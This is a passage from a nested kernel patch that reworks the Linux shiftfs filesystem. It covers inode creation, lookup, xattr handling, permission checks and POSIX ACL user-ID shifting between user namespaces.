-+	}
-+
-+	return err;
- }
- 
- static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
- {
--	struct dentry *real = dentry->d_fsdata;
--	int ret;
-+	int err = 1;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 
--	if (d_unhashed(real))
-+	if (d_unhashed(lowerd) ||
-+	    ((d_is_negative(lowerd) != d_is_negative(dentry))))
- 		return 0;
- 
--	/*
--	 * inode state of underlying changed from positive to negative
--	 * or vice versa; force a lookup to update our view
--	 */
--	if (d_is_negative(real) != d_is_negative(dentry))
--		return 0;
-+	if (flags & LOOKUP_RCU)
-+		return -ECHILD;
- 
--	if (!(real->d_flags & DCACHE_OP_REVALIDATE))
--		return 1;
-+	if ((lowerd->d_flags & DCACHE_OP_REVALIDATE))
-+		err = lowerd->d_op->d_revalidate(lowerd, flags);
- 
--	ret = real->d_op->d_revalidate(real, flags);
-+	if (d_really_is_positive(dentry)) {
-+		struct inode *inode = d_inode(dentry);
-+		struct inode *loweri = d_inode(lowerd);
- 
--	if (ret == 0 && !(flags & LOOKUP_RCU))
--		d_invalidate(real);
-+		shiftfs_copyattr(loweri, inode);
-+		if (!inode->i_nlink)
-+			err = 0;
-+	}
- 
--	return ret;
-+	return err;
- }
- 
- static const struct dentry_operations shiftfs_dentry_ops = {
--	.d_release	= shiftfs_d_release,
--	.d_real		= shiftfs_d_real,
--	.d_revalidate	= shiftfs_d_revalidate,
-+	.d_release	   = shiftfs_d_release,
-+	.d_real		   = shiftfs_d_real,
-+	.d_revalidate	   = shiftfs_d_revalidate,
- 	.d_weak_revalidate = shiftfs_d_weak_revalidate,
- };
- 
--static int shiftfs_readlink(struct dentry *dentry, char __user *data,
--			    int flags)
--{
--	struct dentry *real = dentry->d_fsdata;
--	const struct inode_operations *iop = real->d_inode->i_op;
--
--	if (iop->readlink)
--		return iop->readlink(real, data, flags);
--
--	return -EINVAL;
--}
--
- static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
- 				    struct delayed_call *done)
- {
--	if (dentry) {
--		struct dentry *real = dentry->d_fsdata;
--		struct inode *reali = real->d_inode;
--		const struct inode_operations *iop = reali->i_op;
--		const char *res = ERR_PTR(-EPERM);
--
--		if (iop->get_link)
--			res = iop->get_link(real, reali, done);
-+	const char *p;
-+	const struct cred *oldcred;
-+	struct dentry *lowerd;
- 
--		return res;
--	} else {
--		/* RCU lookup not supported */
-+	/* RCU lookup not supported */
-+	if (!dentry)
- 		return ERR_PTR(-ECHILD);
--	}
-+
-+	lowerd = dentry->d_fsdata;
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	p = vfs_get_link(lowerd, done);
-+	revert_creds(oldcred);
-+
-+	return p;
- }
- 
- static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
- 			    const char *name, const void *value,
- 			    size_t size, int flags)
- {
--	struct dentry *real = dentry->d_fsdata;
--	int err = -EOPNOTSUPP;
--	const struct cred *oldcred, *newcred;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+	int err;
-+	const struct cred *oldcred;
-+
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = vfs_setxattr(lowerd, name, value, size, flags);
-+	revert_creds(oldcred);
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	err = vfs_setxattr(real, name, value, size, flags);
--	shiftfs_old_creds(oldcred, &newcred);
-+	shiftfs_copyattr(lowerd->d_inode, inode);
- 
- 	return err;
- }
-@@ -214,13 +330,13 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
- 			     struct dentry *dentry, struct inode *inode,
- 			     const char *name, void *value, size_t size)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 	int err;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	err = vfs_getxattr(real, name, value, size);
--	shiftfs_old_creds(oldcred, &newcred);
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = vfs_getxattr(lowerd, name, value, size);
-+	revert_creds(oldcred);
- 
- 	return err;
- }
-@@ -228,26 +344,29 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
- static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
- 				 size_t size)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 	int err;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	err = vfs_listxattr(real, list, size);
--	shiftfs_old_creds(oldcred, &newcred);
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = vfs_listxattr(lowerd, list, size);
-+	revert_creds(oldcred);
- 
- 	return err;
- }
- 
- static int shiftfs_removexattr(struct dentry *dentry, const char *name)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 	int err;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
-+
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = vfs_removexattr(lowerd, name);
-+	revert_creds(oldcred);
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	err = vfs_removexattr(real, name);
--	shiftfs_old_creds(oldcred, &newcred);
-+	/* update c/mtime */
-+	shiftfs_copyattr(lowerd->d_inode, d_inode(dentry));
- 
- 	return err;
- }
-@@ -262,93 +381,157 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler,
- 	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
- }
- 
--static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry)
-+static int shiftfs_inode_test(struct inode *inode, void *data)
- {
--	struct inode *reali;
--
--	if (!dentry)
--		return;
--
--	reali = dentry->d_inode;
--
--	if (!reali->i_op->get_link)
--		inode->i_opflags |= IOP_NOFOLLOW;
-+	return inode->i_private == data;
-+}
- 
--	inode->i_mapping = reali->i_mapping;
--	inode->i_private = dentry;
-+static int shiftfs_inode_set(struct inode *inode, void *data)
-+{
-+	inode->i_private = data;
-+	return 0;
- }
- 
--static int shiftfs_make_object(struct inode *dir, struct dentry *dentry,
--			       umode_t mode, const char *symlink,
--			       struct dentry *hardlink, bool excl)
-+static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
-+				 umode_t mode, const char *symlink,
-+				 struct dentry *hardlink, bool excl)
- {
--	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
--	struct inode *reali = real->d_inode, *newi;
--	const struct inode_operations *iop = reali->i_op;
- 	int err;
--	const struct cred *oldcred, *newcred;
--	bool op_ok = false;
-+	const struct cred *oldcred;
-+	struct cred *newcred;
-+	void *loweri_iop_ptr = NULL;
-+	umode_t modei = mode;
-+	struct super_block *dir_sb = diri->i_sb;
-+	struct dentry *lowerd_new = dentry->d_fsdata;
-+	struct inode *inode = NULL, *loweri_dir = diri->i_private;
-+	const struct inode_operations *loweri_dir_iop = loweri_dir->i_op;
-+	struct dentry *lowerd_link = NULL;
- 
- 	if (hardlink) {
--		op_ok = iop->link;
-+		loweri_iop_ptr = loweri_dir_iop->link;
- 	} else {
- 		switch (mode & S_IFMT) {
- 		case S_IFDIR:
--			op_ok = iop->mkdir;
-+			loweri_iop_ptr = loweri_dir_iop->mkdir;
- 			break;
- 		case S_IFREG:
--			op_ok = iop->create;
-+			loweri_iop_ptr = loweri_dir_iop->create;
- 			break;
- 		case S_IFLNK:
--			op_ok = iop->symlink;
-+			loweri_iop_ptr = loweri_dir_iop->symlink;
-+			break;
-+		case S_IFSOCK:
-+			/* fall through */
-+		case S_IFIFO:
-+			loweri_iop_ptr = loweri_dir_iop->mknod;
-+			break;
- 		}
- 	}
--	if (!op_ok)
--		return -EINVAL;
-+	if (!loweri_iop_ptr) {
-+		err = -EINVAL;
-+		goto out_iput;
-+	}
- 
-+	inode_lock_nested(loweri_dir, I_MUTEX_PARENT);
- 
--	newi = shiftfs_new_inode(dentry->d_sb, mode, NULL);
--	if (!newi)
--		return -ENOMEM;
-+	if (!hardlink) {
-+		inode = new_inode(dir_sb);
-+		if (!inode) {
-+			err = -ENOMEM;
-+			goto out_iput;
-+		}
-+
-+		/*
-+		 * new_inode() will have added the new inode to the super
-+		 * block's list of inodes. Further below we will call
-+		 * inode_insert5() Which would perform the same operation again
-+		 * thereby corrupting the list. To avoid this raise I_CREATING
-+		 * in i_state which will cause inode_insert5() to skip this
-+		 * step. I_CREATING will be cleared by d_instantiate_new()
-+		 * below.
-+		 */
-+		spin_lock(&inode->i_lock);
-+		inode->i_state |= I_CREATING;
-+		spin_unlock(&inode->i_lock);
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+		inode_init_owner(inode, diri, mode);
-+		modei = inode->i_mode;
-+	}
- 
--	inode_lock_nested(reali, I_MUTEX_PARENT);
-+	err = shiftfs_override_object_creds(dentry->d_sb, &oldcred, &newcred,
-+					    dentry, modei, hardlink != NULL);
-+	if (err)
-+		goto out_iput;
- 
--	err = -EINVAL;		/* shut gcc up about uninit var */
- 	if (hardlink) {
--		struct dentry *realhardlink = hardlink->d_fsdata;
--
--		err = vfs_link(realhardlink, reali, new, NULL);
-+		lowerd_link = hardlink->d_fsdata;
-+		err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL);
- 	} else {
--		switch (mode & S_IFMT) {
-+		switch (modei & S_IFMT) {
- 		case S_IFDIR:
--			err = vfs_mkdir(reali, new, mode);
-+			err = vfs_mkdir(loweri_dir, lowerd_new, modei);
- 			break;
- 		case S_IFREG:
--			err = vfs_create(reali, new, mode, excl);
-+			err = vfs_create(loweri_dir, lowerd_new, modei, excl);
- 			break;
- 		case S_IFLNK:
--			err = vfs_symlink(reali, new, symlink);
-+			err = vfs_symlink(loweri_dir, lowerd_new, symlink);
-+			break;
-+		case S_IFSOCK:
-+			/* fall through */
-+		case S_IFIFO:
-+			err = vfs_mknod(loweri_dir, lowerd_new, modei, 0);
-+			break;
-+		default:
-+			err = -EINVAL;
-+			break;
- 		}
- 	}
- 
--	shiftfs_old_creds(oldcred, &newcred);
-+	shiftfs_revert_object_creds(oldcred, newcred);
- 
-+	if (!err && WARN_ON(!lowerd_new->d_inode))
-+		err = -EIO;
- 	if (err)
--		goto out_dput;
-+		goto out_iput;
-+
-+	if (hardlink) {
-+		inode = d_inode(hardlink);
-+		ihold(inode);
-+
-+		/* copy up times from lower inode */
-+		shiftfs_copyattr(d_inode(lowerd_link), inode);
-+		set_nlink(d_inode(hardlink), d_inode(lowerd_link)->i_nlink);
-+		d_instantiate(dentry, inode);
-+	} else {
-+		struct inode *inode_tmp;
-+		struct inode *loweri_new = d_inode(lowerd_new);
-+
-+		inode_tmp = inode_insert5(inode, (unsigned long)loweri_new,
-+					  shiftfs_inode_test, shiftfs_inode_set,
-+					  loweri_new);
-+		if (unlikely(inode_tmp != inode)) {
-+			pr_err_ratelimited("shiftfs: newly created inode found in cache\n");
-+			iput(inode_tmp);
-+			err = -EINVAL;
-+			goto out_iput;
-+		}
- 
--	shiftfs_fill_inode(newi, new);
-+		ihold(loweri_new);
-+		shiftfs_fill_inode(inode, loweri_new->i_ino, loweri_new->i_mode,
-+				   0, lowerd_new);
-+		d_instantiate_new(dentry, inode);
-+	}
- 
--	d_instantiate(dentry, newi);
-+	shiftfs_copyattr(loweri_dir, diri);
-+	if (loweri_iop_ptr == loweri_dir_iop->mkdir)
-+		set_nlink(diri, loweri_dir->i_nlink);
- 
--	new = NULL;
--	newi = NULL;
-+	inode = NULL;
- 
-- out_dput:
--	dput(new);
--	iput(newi);
--	inode_unlock(reali);
-+out_iput:
-+	iput(inode);
-+	inode_unlock(loweri_dir);
- 
- 	return err;
- }
-@@ -358,7 +541,7 @@ static int shiftfs_create(struct inode *dir, struct dentry *dentry,
- {
- 	mode |= S_IFREG;
- 
--	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
- }
- 
- static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
-@@ -366,39 +549,52 @@ static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
- {
- 	mode |= S_IFDIR;
- 
--	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
- 			struct dentry *dentry)
- {
--	return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false);
-+	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
-+}
-+
-+static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
-+			 dev_t rdev)
-+{
-+	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
-+		return -EPERM;
-+
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
- 			   const char *symlink)
- {
--	return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false);
-+	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
- }
- 
- static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- {
--	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
--	struct inode *reali = real->d_inode;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+	struct inode *loweri = dir->i_private;
- 	int err;
--	const struct cred *oldcred, *newcred;
--
--	inode_lock_nested(reali, I_MUTEX_PARENT);
--
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	const struct cred *oldcred;
- 
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	inode_lock_nested(loweri, I_MUTEX_PARENT);
- 	if (rmdir)
--		err = vfs_rmdir(reali, new);
-+		err = vfs_rmdir(loweri, lowerd);
- 	else
--		err = vfs_unlink(reali, new, NULL);
-+		err = vfs_unlink(loweri, lowerd, NULL);
-+	inode_unlock(loweri);
-+	revert_creds(oldcred);
- 
--	shiftfs_old_creds(oldcred, &newcred);
--	inode_unlock(reali);
-+	shiftfs_copyattr(loweri, dir);
-+	set_nlink(d_inode(dentry), loweri->i_nlink);
-+	if (!err)
-+		d_drop(dentry);
-+
-+	set_nlink(dir, loweri->i_nlink);
- 
- 	return err;
- }
-@@ -417,27 +613,30 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
- 			  struct inode *newdir, struct dentry *new,
- 			  unsigned int flags)
- {
--	struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private,
--		*realold = old->d_fsdata,
--		*realnew = new->d_fsdata, *trap;
--	struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode;
-+	struct dentry *lowerd_dir_old = old->d_parent->d_fsdata,
-+		      *lowerd_dir_new = new->d_parent->d_fsdata,
-+		      *lowerd_old = old->d_fsdata, *lowerd_new = new->d_fsdata,
-+		      *trapd;
-+	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
-+		     *loweri_dir_new = lowerd_dir_new->d_inode;
- 	int err = -EINVAL;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
- 
--	trap = lock_rename(rndd, rodd);
-+	trapd = lock_rename(lowerd_dir_new, lowerd_dir_old);
- 
--	if (trap == realold || trap == realnew)
-+	if (trapd == lowerd_old || trapd == lowerd_new)
- 		goto out_unlock;
- 
--	oldcred = shiftfs_new_creds(&newcred, old->d_sb);
--
--	err = vfs_rename(realolddir, realold, realnewdir,
--			 realnew, NULL, flags);
-+	oldcred = shiftfs_override_creds(old->d_sb);
-+	err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new,
-+			 NULL, flags);
-+	revert_creds(oldcred);
- 
--	shiftfs_old_creds(oldcred, &newcred);
-+	shiftfs_copyattr(loweri_dir_old, olddir);
-+	shiftfs_copyattr(loweri_dir_new, newdir);
- 
-- out_unlock:
--	unlock_rename(rndd, rodd);
-+out_unlock:
-+	unlock_rename(lowerd_dir_new, lowerd_dir_old);
- 
- 	return err;
- }
-@@ -445,304 +644,1210 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
- static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
- 				     unsigned int flags)
- {
--	struct dentry *real = dir->i_private, *new;
--	struct inode *reali = real->d_inode, *newi;
--	const struct cred *oldcred, *newcred;
--
--	inode_lock(reali);
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len);
--	shiftfs_old_creds(oldcred, &newcred);
--	inode_unlock(reali);
-+	struct dentry *new;
-+	struct inode *newi;
-+	const struct cred *oldcred;
-+	struct dentry *lowerd = dentry->d_parent->d_fsdata;
-+	struct inode *inode = NULL, *loweri = lowerd->d_inode;
-+
-+	inode_lock(loweri);
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	new = lookup_one_len(dentry->d_name.name, lowerd, dentry->d_name.len);
-+	revert_creds(oldcred);
-+	inode_unlock(loweri);
- 
- 	if (IS_ERR(new))
- 		return new;
- 
- 	dentry->d_fsdata = new;
- 
--	newi = NULL;
--	if (!new->d_inode)
-+	newi = new->d_inode;
-+	if (!newi)
- 		goto out;
- 
--	newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new);
--	if (!newi) {
-+	inode = iget5_locked(dentry->d_sb, (unsigned long)newi,
-+			     shiftfs_inode_test, shiftfs_inode_set, newi);
-+	if (!inode) {
- 		dput(new);
- 		return ERR_PTR(-ENOMEM);
- 	}
-+	if (inode->i_state & I_NEW) {
-+		/*
-+		 * inode->i_private set by shiftfs_inode_set(), but we still
-+		 * need to take a reference
-+		*/
-+		ihold(newi);
-+		shiftfs_fill_inode(inode, newi->i_ino, newi->i_mode, 0, new);
-+		unlock_new_inode(inode);
-+	}
- 
-- out:
--	return d_splice_alias(newi, dentry);
-+out:
-+	return d_splice_alias(inode, dentry);
- }
- 
- static int shiftfs_permission(struct inode *inode, int mask)
- {
--	struct dentry *real = inode->i_private;
--	struct inode *reali = real->d_inode;
--	const struct inode_operations *iop = reali->i_op;
- 	int err;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
-+	struct inode *loweri = inode->i_private;
- 
--	if (mask & MAY_NOT_BLOCK)
-+	if (!loweri) {
-+		WARN_ON(!(mask & MAY_NOT_BLOCK));
- 		return -ECHILD;
-+	}
- 
--	oldcred = shiftfs_new_creds(&newcred, inode->i_sb);
--	if (iop->permission)
--		err = iop->permission(reali, mask);
--	else
--		err = generic_permission(reali, mask);
--	shiftfs_old_creds(oldcred, &newcred);
-+	err = generic_permission(inode, mask);
-+	if (err)
-+		return err;
-+
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	err = inode_permission(loweri, mask);
-+	revert_creds(oldcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_fiemap(struct inode *inode,
-+			  struct fiemap_extent_info *fieinfo, u64 start,
-+			  u64 len)
-+{
-+	int err;
-+	const struct cred *oldcred;
-+	struct inode *loweri = inode->i_private;
-+
-+	if (!loweri->i_op->fiemap)
-+		return -EOPNOTSUPP;
-+
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	if (fieinfo->fi_flags & FIEMAP_FLAG_SYNC)
-+		filemap_write_and_wait(loweri->i_mapping);
-+	err = loweri->i_op->fiemap(loweri, fieinfo, start, len);
-+	revert_creds(oldcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
-+			   umode_t mode)
-+{
-+	int err;
-+	const struct cred *oldcred;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+	struct inode *loweri = dir->i_private;
-+
-+	if (!loweri->i_op->tmpfile)
-+		return -EOPNOTSUPP;
-+
-+	oldcred = shiftfs_override_creds(dir->i_sb);
-+	err = loweri->i_op->tmpfile(loweri, lowerd, mode);
-+	revert_creds(oldcred);
- 
- 	return err;
- }
- 
- static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- {
--	struct dentry *real = dentry->d_fsdata;
--	struct inode *reali = real->d_inode;
--	const struct inode_operations *iop = reali->i_op;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+	struct inode *loweri = lowerd->d_inode;
- 	struct iattr newattr = *attr;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
- 	struct super_block *sb = dentry->d_sb;
- 	int err;
- 
-+	err = setattr_prepare(dentry, attr);
-+	if (err)
-+		return err;
-+
- 	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
- 	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	inode_lock(reali);
--	if (iop->setattr)
--		err = iop->setattr(real, &newattr);
--	else
--		err = simple_setattr(real, &newattr);
--	inode_unlock(reali);
--	shiftfs_old_creds(oldcred, &newcred);
-+	inode_lock(loweri);
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = notify_change(lowerd, attr, NULL);
-+	revert_creds(oldcred);
-+	inode_unlock(loweri);
- 
--	if (err)
--		return err;
-+	shiftfs_copyattr(loweri, d_inode(dentry));
- 
--	/* all OK, reflect the change on our inode */
--	setattr_copy(d_inode(dentry), attr);
--	return 0;
-+	return err;
- }
- 
- static int shiftfs_getattr(const struct path *path, struct kstat *stat,
- 			   u32 request_mask, unsigned int query_flags)
- {
- 	struct inode *inode = path->dentry->d_inode;
--	struct dentry *real = path->dentry->d_fsdata;
--	struct inode *reali = real->d_inode;
--	const struct inode_operations *iop = reali->i_op;
--	struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real };
--	int err = 0;
--
--	if (iop->getattr)
--		err = iop->getattr(&newpath, stat, request_mask, query_flags);
--	else
--		generic_fillattr(reali, stat);
-+	struct dentry *lowerd = path->dentry->d_fsdata;
-+	struct inode *loweri = lowerd->d_inode;
-+	struct shiftfs_super_info *info = path->dentry->d_sb->s_fs_info;
-+	struct path newpath = { .mnt = info->mnt, .dentry = lowerd };
-+	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
-+	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
-+	const struct cred *oldcred;
-+	int err;
-+
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	err = vfs_getattr(&newpath, stat, request_mask, query_flags);
-+	revert_creds(oldcred);
- 
- 	if (err)
- 		return err;
- 
- 	/* transform the underlying id */
--	stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid));
--	stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid));
-+	stat->uid = shift_kuid(from_ns, to_ns, stat->uid);
-+	stat->gid = shift_kgid(from_ns, to_ns, stat->gid);
- 	return 0;
- }
- 
--static const struct inode_operations shiftfs_inode_ops = {
--	.lookup		= shiftfs_lookup,
--	.getattr	= shiftfs_getattr,
--	.setattr	= shiftfs_setattr,
--	.permission	= shiftfs_permission,
--	.mkdir		= shiftfs_mkdir,
--	.symlink	= shiftfs_symlink,
--	.get_link	= shiftfs_get_link,
--	.readlink	= shiftfs_readlink,
--	.unlink		= shiftfs_unlink,
--	.rmdir		= shiftfs_rmdir,
--	.rename		= shiftfs_rename,
--	.link		= shiftfs_link,
--	.create		= shiftfs_create,
--	.mknod		= NULL,	/* no special files currently */
--	.listxattr	= shiftfs_listxattr,
--};
-+#ifdef CONFIG_SHIFT_FS_POSIX_ACL
- 
--static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
--				       struct dentry *dentry)
-+static int
-+shift_acl_ids(struct user_namespace *from, struct user_namespace *to,
-+	      struct posix_acl *acl)
- {
--	struct inode *inode;
--
--	inode = new_inode(sb);
--	if (!inode)
--		return NULL;
--
--	/*
--	 * our inode is completely vestigial.  All lookups, getattr
--	 * and permission checks are done on the underlying inode, so
--	 * what the user sees is entirely from the underlying inode.
--	 */
--	mode &= S_IFMT;
-+	int i;
-+
-+	for (i = 0; i < acl->a_count; i++) {
-+		struct posix_acl_entry *e = &acl->a_entries[i];
-+		switch(e->e_tag) {
-+		case ACL_USER:
-+			e->e_uid = shift_kuid(from, to, e->e_uid);
-+			if (!uid_valid(e->e_uid))
-+				return -EOVERFLOW;
-+			break;
-+		case ACL_GROUP:
-+			e->e_gid = shift_kgid(from, to, e->e_gid);
-+			if (!gid_valid(e->e_gid))
-+				return -EOVERFLOW;
-+			break;
-+		}
-+	}
-+	return 0;
-+}
- 
--	inode->i_ino = get_next_ino();
--	inode->i_mode = mode;
--	inode->i_flags |= S_NOATIME | S_NOCMTIME;
-+static void
-+shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
-+		    void *value, size_t size)
-+{
-+	struct posix_acl_xattr_header *header = value;
-+	struct posix_acl_xattr_entry *entry = (void *)(header + 1), *end;
-+	int count;
-+	kuid_t kuid;
-+	kgid_t kgid;
- 
--	inode->i_op = &shiftfs_inode_ops;
-+	if (!value)
-+		return;
-+	if (size < sizeof(struct posix_acl_xattr_header))
-+		return;
-+	if (header->a_version != cpu_to_le32(POSIX_ACL_XATTR_VERSION))
-+		return;
- 
--	shiftfs_fill_inode(inode, dentry);
-+	count = posix_acl_xattr_count(size);
-+	if (count < 0)
-+		return;
-+	if (count == 0)
-+		return;
- 
--	return inode;
-+	for (end = entry + count; entry != end; entry++) {
-+		switch(le16_to_cpu(entry->e_tag)) {
-+		case ACL_USER:
-+			kuid = make_kuid(&init_user_ns, le32_to_cpu(entry->e_id));
-+			kuid = shift_kuid(from, to, kuid);
-+			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
-+			break;
-+		case ACL_GROUP:
-+			kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id));
-+			kgid = shift_kgid(from, to, kgid);
-+			entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid));
-+			break;
-+		default:
-+			break;
-+		}
-+	}
- }
- 
--static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
-+static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
- {
--	struct super_block *sb = dentry->d_sb;
--	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+	struct inode *loweri = inode->i_private;
-+	const struct cred *oldcred;
-+	struct posix_acl *lower_acl, *acl = NULL;
-+	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
-+	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
-+	int size;
-+	int err;
- 
--	if (ssi->mark)
--		seq_show_option(m, "mark", NULL);
-+	if (!IS_POSIXACL(loweri))
-+		return NULL;
- 
--	return 0;
--}
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	lower_acl = get_acl(loweri, type);
-+	revert_creds(oldcred);
- 
--static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
--{
--	struct super_block *sb = dentry->d_sb;
--	struct shiftfs_super_info *ssi = sb->s_fs_info;
--	struct dentry *root = sb->s_root;
--	struct dentry *realroot = root->d_fsdata;
--	struct path realpath = { .mnt = ssi->mnt, .dentry = realroot };
--	int err;
-+	if (lower_acl && !IS_ERR(lower_acl)) {
-+		/* XXX: export posix_acl_clone? */
-+		size = sizeof(struct posix_acl) +
-+		       lower_acl->a_count * sizeof(struct posix_acl_entry);
-+		acl = kmemdup(lower_acl, size, GFP_KERNEL);
-+		posix_acl_release(lower_acl);
- 
--	err = vfs_statfs(&realpath, buf);
--	if (err)
--		return err;
-+		if (!acl)
-+			return ERR_PTR(-ENOMEM);
- 
--	buf->f_type = sb->s_magic;
-+		refcount_set(&acl->a_refcount, 1);
- 
--	return 0;
-+		err = shift_acl_ids(from_ns, to_ns, acl);
-+		if (err) {
-+			kfree(acl);
-+			return ERR_PTR(err);
-+		}
-+	}
-+
-+	return acl;
- }
- 
--static void shiftfs_put_super(struct super_block *sb)
-+static int
-+shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
-+			   struct dentry *dentry, struct inode *inode,
-+			   const char *name, void *buffer, size_t size)
- {
--	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+	struct inode *loweri = inode->i_private;
-+	int ret;
-+
-+	ret = shiftfs_xattr_get(NULL, dentry, inode, handler->name,
-+				buffer, size);
-+	if (ret < 0)
-+		return ret;
- 
--	mntput(ssi->mnt);
--	put_user_ns(ssi->userns);
--	kfree(ssi);
-+	inode_lock(loweri);
-+	shift_acl_xattr_ids(loweri->i_sb->s_user_ns, inode->i_sb->s_user_ns,
-+			    buffer, size);
-+	inode_unlock(loweri);
-+	return ret;
- }
- 
--static const struct xattr_handler shiftfs_xattr_handler = {
--	.prefix = "",
--	.get    = shiftfs_xattr_get,
--	.set    = shiftfs_xattr_set,
--};
-+static int
-+shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
-+			    struct dentry *dentry, struct inode *inode,
-+			    const char *name, const void *value,
-+			    size_t size, int flags)
-+{
-+	struct inode *loweri = inode->i_private;
-+	int err;
- 
--const struct xattr_handler *shiftfs_xattr_handlers[] = {
--	&shiftfs_xattr_handler,
--	NULL
--};
-+	if (!IS_POSIXACL(loweri) || !loweri->i_op->set_acl)
-+		return -EOPNOTSUPP;
-+	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
-+		return value ? -EACCES : 0;
-+	if (!inode_owner_or_capable(inode))
-+		return -EPERM;
-+
-+	if (value) {
-+		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
-+				    loweri->i_sb->s_user_ns,
-+				    (void *)value, size);
-+		err = shiftfs_setxattr(dentry, inode, handler->name, value,
-+				       size, flags);
